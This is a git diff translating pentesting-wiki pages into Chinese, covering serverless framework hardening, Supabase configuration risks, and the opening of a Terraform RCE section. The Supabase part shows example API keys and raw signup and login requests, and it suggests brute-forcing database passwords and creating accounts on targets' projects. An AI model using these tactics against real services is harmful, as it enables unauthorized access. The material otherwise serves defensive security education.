-#### **Mitigation Strategies** +#### **缓解策略** -- **Principle of Least Privilege:** Assign only necessary permissions to each function. - - ```yaml - provider: - [...] - iam: - role: - statements: - - Effect: 'Allow' - Action: - - 'dynamodb:PutItem' - - 'dynamodb:Get*' - - 'dynamodb:Scan*' - - 'dynamodb:UpdateItem' - - 'dynamodb:DeleteItem' - Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} - ``` - -- **Use Separate Roles:** Differentiate roles based on function requirements. - ---- - -### **Insecure Secrets and Configuration Management** - -Storing sensitive information (e.g., API keys, database credentials) directly in **`serverless.yml`** or code can lead to exposure if repositories are compromised. - -The **recommended** way to store environment variables in **`serverless.yml`** file from serverless.com (at the time of this writing) is to use the `ssm` or `s3` providers, which allows to get the **environment values from these sources at deployment time** and **configure** the **lambdas** environment variables with the **text clear of the values**! - -> [!CAUTION] -> Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!** - -For example, the following example will use SSM to get an environment variable: +- **最小权限原则:** 仅为每个函数分配必要的权限。 ```yaml provider: - environment: - DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true} +[...] +iam: +role: +statements: +- Effect: 'Allow' +Action: +- 'dynamodb:PutItem' +- 'dynamodb:Get*' +- 'dynamodb:Scan*' +- 'dynamodb:UpdateItem' +- 'dynamodb:DeleteItem' +Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} ``` -And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **added in clear text inside the lambda environment variable**. +- **使用单独的角色:** 根据函数需求区分角色。 + +--- + +### **不安全的秘密和配置管理** + +将敏感信息(例如,API 密钥、数据库凭据)直接存储在 **`serverless.yml`** 或代码中,如果存储库被攻破,可能会导致泄露。 + +在 **`serverless.yml`** 文件中存储环境变量的 **推荐** 方法是使用 `ssm` 或 `s3` 提供者,这允许在部署时从这些来源获取 **环境值** 并 **配置** **lambdas** 的环境变量,**文本中不包含值**! + +> [!CAUTION] +> 因此,任何有权限读取 AWS 中 lambdas 配置的人都将能够 **以明文访问所有这些环境变量!** + +例如,以下示例将使用 SSM 获取一个环境变量: +```yaml +provider: +environment: +DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true} +``` +And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **以明文形式添加到lambda环境变量中**。 > [!TIP] -> The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**. +> 使用serveless.com存储环境变量的推荐方法是**将其存储在AWS秘密中**,并仅在环境变量中存储秘密名称,**lambda代码应收集它**。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Secrets Manager Integration:** Use services like **AWS Secrets Manager.** -- **Encrypted Variables:** Leverage Serverless Framework’s encryption features for sensitive data. -- **Access Controls:** Restrict access to secrets based on roles. 
+- **秘密管理器集成:** 使用像**AWS Secrets Manager**这样的服务。 +- **加密变量:** 利用Serverless Framework的加密功能来保护敏感数据。 +- **访问控制:** 根据角色限制对秘密的访问。 --- -### **Vulnerable Code and Dependencies** +### **脆弱的代码和依赖项** -Outdated or insecure dependencies can introduce vulnerabilities, while improper input handling may lead to code injection attacks. +过时或不安全的依赖项可能引入漏洞,而不当的输入处理可能导致代码注入攻击。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Dependency Management:** Regularly update dependencies and scan for vulnerabilities. +- **依赖管理:** 定期更新依赖项并扫描漏洞。 - ```yaml - plugins: - - serverless-webpack - - serverless-plugin-snyk - ``` +```yaml +plugins: +- serverless-webpack +- serverless-plugin-snyk +``` -- **Input Validation:** Implement strict validation and sanitization of all inputs. -- **Code Reviews:** Conduct thorough reviews to identify security flaws. -- **Static Analysis:** Use tools to detect vulnerabilities in the codebase. +- **输入验证:** 实施严格的验证和清理所有输入。 +- **代码审查:** 进行彻底的审查以识别安全缺陷。 +- **静态分析:** 使用工具检测代码库中的漏洞。 --- -### **Inadequate Logging and Monitoring** +### **日志和监控不足** -Without proper logging and monitoring, malicious activities may go undetected, delaying incident response. +没有适当的日志记录和监控,恶意活动可能会被忽视,从而延迟事件响应。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**. +- **集中日志记录:** 使用像**AWS CloudWatch**或**Datadog**这样的服务聚合日志。 - ```yaml - plugins: - - serverless-plugin-datadog - ``` +```yaml +plugins: +- serverless-plugin-datadog +``` -- **Enable Detailed Logging:** Capture essential information without exposing sensitive data. -- **Set Up Alerts:** Configure alerts for suspicious activities or anomalies. -- **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents. +- **启用详细日志记录:** 捕获重要信息而不暴露敏感数据。 +- **设置警报:** 配置对可疑活动或异常的警报。 +- **定期监控:** 持续监控日志和指标以发现潜在的安全事件。 --- -### **Insecure API Gateway Configurations** +### **不安全的API网关配置** -Open or improperly secured APIs can be exploited for unauthorized access, Denial of Service (DoS) attacks, or cross-site attacks. +开放或不当保护的API可能被利用进行未经授权的访问、拒绝服务(DoS)攻击或跨站攻击。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT. +- **身份验证和授权:** 实施强大的机制,如OAuth、API密钥或JWT。 - ```yaml - functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - authorizer: aws_iam - ``` +```yaml +functions: +hello: +handler: handler.hello +events: +- http: +path: hello +method: get +authorizer: aws_iam +``` -- **Rate Limiting and Throttling:** Prevent abuse by limiting request rates. +- **速率限制和节流:** 通过限制请求速率来防止滥用。 - ```yaml - provider: - apiGateway: - throttle: - burstLimit: 200 - rateLimit: 100 - ``` +```yaml +provider: +apiGateway: +throttle: +burstLimit: 200 +rateLimit: 100 +``` -- **Secure CORS Configuration:** Restrict allowed origins, methods, and headers. +- **安全的CORS配置:** 限制允许的来源、方法和头部。 - ```yaml - functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - cors: - origin: https://yourdomain.com - headers: - - Content-Type - ``` +```yaml +functions: +hello: +handler: handler.hello +events: +- http: +path: hello +method: get +cors: +origin: https://yourdomain.com +headers: +- Content-Type +``` -- **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns. 
+- **使用Web应用防火墙(WAF):** 过滤和监控HTTP请求以检测恶意模式。 --- -### **Insufficient Function Isolation** +### **功能隔离不足** -Shared resources and inadequate isolation can lead to privilege escalations or unintended interactions between functions. +共享资源和不充分的隔离可能导致权限提升或函数之间的意外交互。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation. -- **Resource Partitioning:** Use separate databases or storage buckets for different functions. -- **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation. +- **隔离功能:** 分配不同的资源和IAM角色以确保独立操作。 +- **资源分区:** 为不同的功能使用单独的数据库或存储桶。 +- **使用VPC:** 在虚拟私有云中部署功能以增强网络隔离。 - ```yaml - provider: - vpc: - securityGroupIds: - - sg-xxxxxxxx - subnetIds: - - subnet-xxxxxx - ``` +```yaml +provider: +vpc: +securityGroupIds: +- sg-xxxxxxxx +subnetIds: +- subnet-xxxxxx +``` -- **Limit Function Permissions:** Ensure functions cannot access or interfere with each other’s resources unless explicitly required. +- **限制功能权限:** 确保功能不能访问或干扰彼此的资源,除非明确需要。 --- -### **Inadequate Data Protection** +### **数据保护不足** -Unencrypted data at rest or in transit can be exposed, leading to data breaches or tampering. +静态或传输中的未加密数据可能会被暴露,导致数据泄露或篡改。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Encrypt Data at Rest:** Utilize cloud service encryption features. +- **加密静态数据:** 利用云服务的加密功能。 - ```yaml - resources: - Resources: - MyDynamoDBTable: - Type: AWS::DynamoDB::Table - Properties: - SSESpecification: - SSEEnabled: true - ``` +```yaml +resources: +Resources: +MyDynamoDBTable: +Type: AWS::DynamoDB::Table +Properties: +SSESpecification: +SSEEnabled: true +``` -- **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions. -- **Secure API Communication:** Enforce encryption protocols and validate certificates. -- **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly. +- **加密传输中的数据:** 对所有数据传输使用HTTPS/TLS。 +- **安全的API通信:** 强制执行加密协议并验证证书。 +- **安全管理加密密钥:** 使用托管密钥服务并定期轮换密钥。 --- -### **Lack of Proper Error Handling** +### **缺乏适当的错误处理** -Detailed error messages can leak sensitive information about the infrastructure or codebase, while unhandled exceptions may lead to application crashes. +详细的错误消息可能泄露有关基础设施或代码库的敏感信息,而未处理的异常可能导致应用程序崩溃。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Generic Error Messages:** Avoid exposing internal details in error responses. +- **通用错误消息:** 避免在错误响应中暴露内部细节。 - ```javascript - javascriptCopy code// Example in Node.js - exports.hello = async (event) => { - try { - // Function logic - } catch (error) { - console.error(error); - return { - statusCode: 500, - body: JSON.stringify({ message: 'Internal Server Error' }), - }; - } - }; - ``` +```javascript +javascriptCopy code// Example in Node.js +exports.hello = async (event) => { +try { +// Function logic +} catch (error) { +console.error(error); +return { +statusCode: 500, +body: JSON.stringify({ message: 'Internal Server Error' }), +}; +} +}; +``` -- **Centralized Error Handling:** Manage and sanitize errors consistently across all functions. -- **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users. +- **集中错误处理:** 在所有功能中一致地管理和清理错误。 +- **监控和记录错误:** 跟踪和分析内部错误,而不向最终用户暴露细节。 --- -### **Insecure Deployment Practices** +### **不安全的部署实践** -Exposed deployment configurations or unauthorized access to CI/CD pipelines can lead to malicious code deployments or misconfigurations. 
+暴露的部署配置或对CI/CD管道的未经授权访问可能导致恶意代码部署或配置错误。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits. -- **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data. -- **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies. -- **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices. +- **安全的CI/CD管道:** 实施严格的访问控制、多因素身份验证(MFA)和定期审计。 +- **安全存储配置:** 确保部署文件不包含硬编码的秘密和敏感数据。 +- **使用基础设施即代码(IaC)安全工具:** 使用像**Checkov**或**Terraform Sentinel**这样的工具来强制执行安全策略。 +- **不可变部署:** 通过采用不可变基础设施实践来防止部署后未经授权的更改。 --- -### **Vulnerabilities in Plugins and Extensions** +### **插件和扩展中的漏洞** -Using unvetted or malicious third-party plugins can introduce vulnerabilities into your serverless applications. +使用未经审查或恶意的第三方插件可能会将漏洞引入您的无服务器应用程序。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources. -- **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface. -- **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches. -- **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises. +- **彻底审查插件:** 在集成之前评估插件的安全性,优先选择来自信誉良好的来源的插件。 +- **限制插件使用:** 仅使用必要的插件以最小化攻击面。 +- **监控插件更新:** 保持插件更新以受益于安全补丁。 +- **隔离插件环境:** 在隔离环境中运行插件以限制潜在的妥协。 --- -### **Exposure of Sensitive Endpoints** +### **敏感端点的暴露** -Publicly accessible functions or unrestricted APIs can be exploited for unauthorized operations. +公开可访问的功能或不受限制的API可能被利用进行未经授权的操作。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources. -- **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization. -- **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting. -- **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use. +- **限制功能访问:** 使用VPC、安全组和防火墙规则限制对受信任来源的访问。 +- **实施强大的身份验证:** 确保所有公开的端点都需要适当的身份验证和授权。 +- **安全使用API网关:** 配置API网关以强制执行安全策略,包括输入验证和速率限制。 +- **禁用未使用的端点:** 定期审查并禁用任何不再使用的端点。 --- -### **Excessive Permissions for Team Members and External Collaborators** +### **团队成员和外部合作者的权限过大** -Granting excessive permissions to team members and external collaborators can lead to unauthorized access, data breaches, and misuse of resources. This risk is heightened in environments where multiple individuals have varying levels of access, increasing the attack surface and potential for insider threats. +向团队成员和外部合作者授予过多权限可能导致未经授权的访问、数据泄露和资源滥用。在多个个人具有不同级别访问权限的环境中,这种风险会加大,增加攻击面和内部威胁的潜力。 -#### **Mitigation Strategies** +#### **缓解策略** -- **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks. +- **最小权限原则:** 确保团队成员和合作者仅拥有执行其任务所需的权限。 --- -### **Access Keys and License Keys Security** +### **访问密钥和许可证密钥安全** -**Access Keys** and **License Keys** are critical credentials used to authenticate and authorize interactions with the Serverless Framework CLI. 
+**访问密钥**和**许可证密钥**是用于验证和授权与Serverless Framework CLI交互的关键凭据。 -- **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI. -- **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`. +- **许可证密钥:** 它们是用于验证对Serverless Framework版本4的访问的唯一标识符,允许通过CLI登录。 +- **访问密钥:** 允许Serverless Framework CLI与Serverless Framework Dashboard进行身份验证的凭据。当使用`serverless` cli登录时,访问密钥将**生成并存储在笔记本电脑中**。您还可以将其设置为名为`SERVERLESS_ACCESS_KEY`的环境变量。 -#### **Security Risks** +#### **安全风险** -1. **Exposure Through Code Repositories:** - - Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access. -2. **Insecure Storage:** - - Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage. -3. **Improper Distribution:** - - Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors. -4. **Lack of Rotation:** - - Not regularly rotating keys extends the exposure period if keys are compromised. -5. **Excessive Permissions:** - - Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources. +1. **通过代码库暴露:** +- 硬编码或意外提交访问密钥和许可证密钥到版本控制系统可能导致未经授权的访问。 +2. **不安全的存储:** +- 在环境变量或配置文件中以明文存储密钥而没有适当的加密,增加了泄露的可能性。 +3. **不当分发:** +- 通过不安全的渠道(例如电子邮件、聊天)共享密钥可能导致被恶意行为者拦截。 +4. **缺乏轮换:** +- 不定期轮换密钥会延长密钥被泄露的暴露期。 +5. **权限过大:** +- 拥有广泛权限的密钥可能被利用在多个资源上执行未经授权的操作。 {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/supabase-security.md b/src/pentesting-ci-cd/supabase-security.md index 6fa6219f8..7e63051f9 100644 --- a/src/pentesting-ci-cd/supabase-security.md +++ b/src/pentesting-ci-cd/supabase-security.md @@ -2,49 +2,48 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings. +根据他们的 [**登陆页面**](https://supabase.com/): Supabase 是一个开源的 Firebase 替代品。使用 Postgres 数据库、身份验证、即时 API、边缘函数、实时订阅、存储和向量嵌入开始您的项目。 -### Subdomain +### 子域名 -Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`** +基本上,当创建一个项目时,用户将收到一个 supabase.co 子域名,如:**`jnanozjdybtpqgcwhdiz.supabase.co`** -## **Database configuration** +## **数据库配置** > [!TIP] -> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`** +> **可以通过链接 `https://supabase.com/dashboard/project//settings/database` 访问这些数据** -This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\ -The password is a **password the user put** previously. 
+这个 **数据库** 将部署在某个 AWS 区域,为了连接到它,可以通过以下方式连接:`postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres`(这是在 us-west-1 创建的)。\ +密码是用户之前设置的 **密码**。 -Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**. +因此,由于子域名是已知的,并且它被用作用户名,而 AWS 区域是有限的,可能可以尝试 **暴力破解密码**。 -This section also contains options to: +本节还包含以下选项: -- Reset the database password -- Configure connection pooling -- Configure SSL: Reject plan-text connections (by default they are enabled) -- Configure Disk size -- Apply network restrictions and bans +- 重置数据库密码 +- 配置连接池 +- 配置 SSL:拒绝明文连接(默认情况下启用) +- 配置磁盘大小 +- 应用网络限制和禁令 -## API Configuration +## API 配置 > [!TIP] -> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`** +> **可以通过链接 `https://supabase.com/dashboard/project//settings/api` 访问这些数据** -The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`. +访问您项目中 supabase API 的 URL 将类似于:`https://jnanozjdybtpqgcwhdiz.supabase.co`。 -### anon api keys +### 匿名 API 密钥 -It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in +它还将生成一个 **匿名 API 密钥** (`role: "anon"`),如:`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk`,应用程序需要使用它来联系我们示例中暴露的 API 密钥。 -It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be: +可以在 [**文档**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server) 中找到联系此 API 的 API REST,但最有趣的端点将是:
-Signup (/auth/v1/signup) - +注册 (/auth/v1/signup) ``` POST /auth/v1/signup HTTP/2 Host: id.io.net @@ -69,13 +68,11 @@ Priority: u=1, i {"email":"test@exmaple.com","password":"SomeCOmplexPwd239."} ``` -
-Login (/auth/v1/token?grant_type=password) - +登录 (/auth/v1/token?grant_type=password) ``` POST /auth/v1/token?grant_type=password HTTP/2 Host: hypzbtgspjkludjcnjxl.supabase.co @@ -100,68 +97,63 @@ Priority: u=1, i {"email":"test@exmaple.com","password":"SomeCOmplexPwd239."} ``` -
-So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**. +所以,每当你发现一个客户使用 supabase 和他们被授予的子域名时(公司的一个子域名可能有一个 CNAME 指向他们的 supabase 子域名),你可以尝试 **使用 supabase API 创建一个新账户**。 ### secret / service_role api keys -A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**. +一个秘密 API 密钥也会生成 **`role: "service_role"`**。这个 API 密钥应该是秘密的,因为它能够绕过 **行级安全**。 -The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354` +API 密钥看起来像这样: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354` ### JWT Secret -A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**. +一个 **JWT Secret** 也会被生成,以便应用程序可以 **创建和签署自定义 JWT 令牌**。 -## Authentication +## 认证 -### Signups +### 注册 > [!TIP] -> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints. +> 默认情况下,supabase 将允许 **新用户在你的项目中创建账户**,通过使用之前提到的 API 端点。 -However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\ -This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those: +然而,这些新账户默认情况下 **需要验证他们的电子邮件地址** 才能登录账户。可以启用 **“允许匿名登录”** 以允许人们在不验证电子邮件地址的情况下登录。这可能会授予对 **意外数据** 的访问(他们获得角色 `public` 和 `authenticated`)。\ +这是一个非常糟糕的主意,因为 supabase 按活跃用户收费,因此人们可以创建用户并登录,而 supabase 将为这些用户收费:
-### Passwords & sessions +### 密码和会话 -It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\ -It's recommended to **improve the requirements as the default ones are weak**. +可以指示最小密码长度(默认),要求(默认不要求)并禁止使用泄露的密码。\ +建议 **提高要求,因为默认的要求很弱**。 -- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...) -- Bot and Abuse Protection: It's possible to enable Captcha. +- 用户会话:可以配置用户会话的工作方式(超时,每个用户 1 个会话...) +- 机器人和滥用保护:可以启用验证码。 -### SMTP Settings +### SMTP 设置 -It's possible to set an SMTP to send emails. +可以设置 SMTP 以发送电子邮件。 -### Advanced Settings +### 高级设置 -- Set expire time to access tokens (3600 by default) -- Set to detect and revoke potentially compromised refresh tokens and timeout -- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default) -- Max Direct Database Connections: Max number of connections used to auth (10 by default) -- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default) +- 设置访问令牌的过期时间(默认 3600) +- 设置检测和撤销潜在被泄露的刷新令牌和超时 +- MFA:指示每个用户可以同时注册多少个 MFA 因素(默认 10) +- 最大直接数据库连接:用于身份验证的最大连接数(默认 10) +- 最大请求持续时间:身份验证请求允许持续的最大时间(默认 10 秒) -## Storage +## 存储 > [!TIP] -> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets). +> Supabase 允许 **存储文件** 并通过 URL 使其可访问(它使用 S3 存储桶)。 -- Set the upload file size limit (default is 50MB) -- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3` -- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`) +- 设置上传文件大小限制(默认 50MB) +- S3 连接通过如下 URL 提供: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3` +- 可以 **请求 S3 访问密钥**,由 `access key ID`(例如 `a37d96544d82ba90057e0e06131d0a7b`)和 `secret access key`(例如 `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)组成 -## Edge Functions +## 边缘函数 -It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly). +也可以在 supabase 中 **存储秘密**,这些秘密将 **通过边缘函数访问**(可以从网页创建和删除,但无法直接访问其值)。 {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md index 09b875ff2..35f175627 100644 --- a/src/pentesting-ci-cd/terraform-security.md +++ b/src/pentesting-ci-cd/terraform-security.md @@ -2,307 +2,277 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -[From the docs:](https://developer.hashicorp.com/terraform/intro) +[来自文档:](https://developer.hashicorp.com/terraform/intro) -HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features. +HashiCorp Terraform 是一个 **基础设施即代码工具**,允许您在可版本化、可重用和可共享的人类可读配置文件中定义 **云和本地资源**。然后,您可以使用一致的工作流程来配置和管理整个生命周期中的所有基础设施。Terraform 可以管理低级组件,如计算、存储和网络资源,以及高级组件,如 DNS 条目和 SaaS 功能。 -#### How does Terraform work? 
+#### Terraform 如何工作? -Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API. +Terraform 通过其应用程序编程接口 (APIs) 创建和管理云平台和其他服务上的资源。提供程序使 Terraform 能够与几乎任何具有可访问 API 的平台或服务协同工作。 ![](<../images/image (177).png>) -HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more. +HashiCorp 和 Terraform 社区已经编写了 **超过 1700 个提供程序** 来管理成千上万种不同类型的资源和服务,这个数字还在不断增长。您可以在 [Terraform Registry](https://registry.terraform.io/) 上找到所有公开可用的提供程序,包括亚马逊网络服务 (AWS)、Azure、谷歌云平台 (GCP)、Kubernetes、Helm、GitHub、Splunk、DataDog 等等。 -The core Terraform workflow consists of three stages: +核心 Terraform 工作流程由三个阶段组成: -- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer. -- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration. -- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines. +- **编写:** 您定义资源,这些资源可能跨多个云提供商和服务。例如,您可能会创建一个配置,以在具有安全组和负载均衡器的虚拟私有云 (VPC) 网络中的虚拟机上部署应用程序。 +- **计划:** Terraform 创建一个执行计划,描述它将根据现有基础设施和您的配置创建、更新或销毁的基础设施。 +- **应用:** 经批准后,Terraform 按照正确的顺序执行提议的操作,尊重任何资源依赖关系。例如,如果您更新 VPC 的属性并更改该 VPC 中虚拟机的数量,Terraform 将在扩展虚拟机之前重新创建 VPC。 ![](<../images/image (215).png>) -### Terraform Lab +### Terraform 实验室 -Just install terraform in your computer. +只需在您的计算机上安装 terraform。 -Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads). +这里有一个 [指南](https://learn.hashicorp.com/tutorials/terraform/install-cli),这里有 [下载 terraform 的最佳方式](https://www.terraform.io/downloads)。 -## RCE in Terraform +## Terraform 中的 RCE -Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**. +Terraform **没有暴露网页或网络服务的平台**,因此,妥协 terraform 的唯一方法是 **能够添加/修改 terraform 配置文件**。 -However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly. +然而,terraform 是一个 **非常敏感的组件**,因为它将拥有 **特权访问** 不同位置,以便正常工作。 -The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**. 
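As a rough sketch of why the repository is such a valuable target: whoever checks out the repo (a CI job, Atlantis, or a developer's laptop) will typically run something like the following against whatever revision it serves, and each of these steps interprets attacker-controllable content:

```bash
# Typical automated steps run against the checked-out Terraform config (assumed setup)
terraform init                  # downloads the providers/modules referenced by the config
terraform plan                  # evaluates data sources (e.g. "external") -> code can run here
terraform apply -auto-approve   # provisioners such as local-exec execute on apply
```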
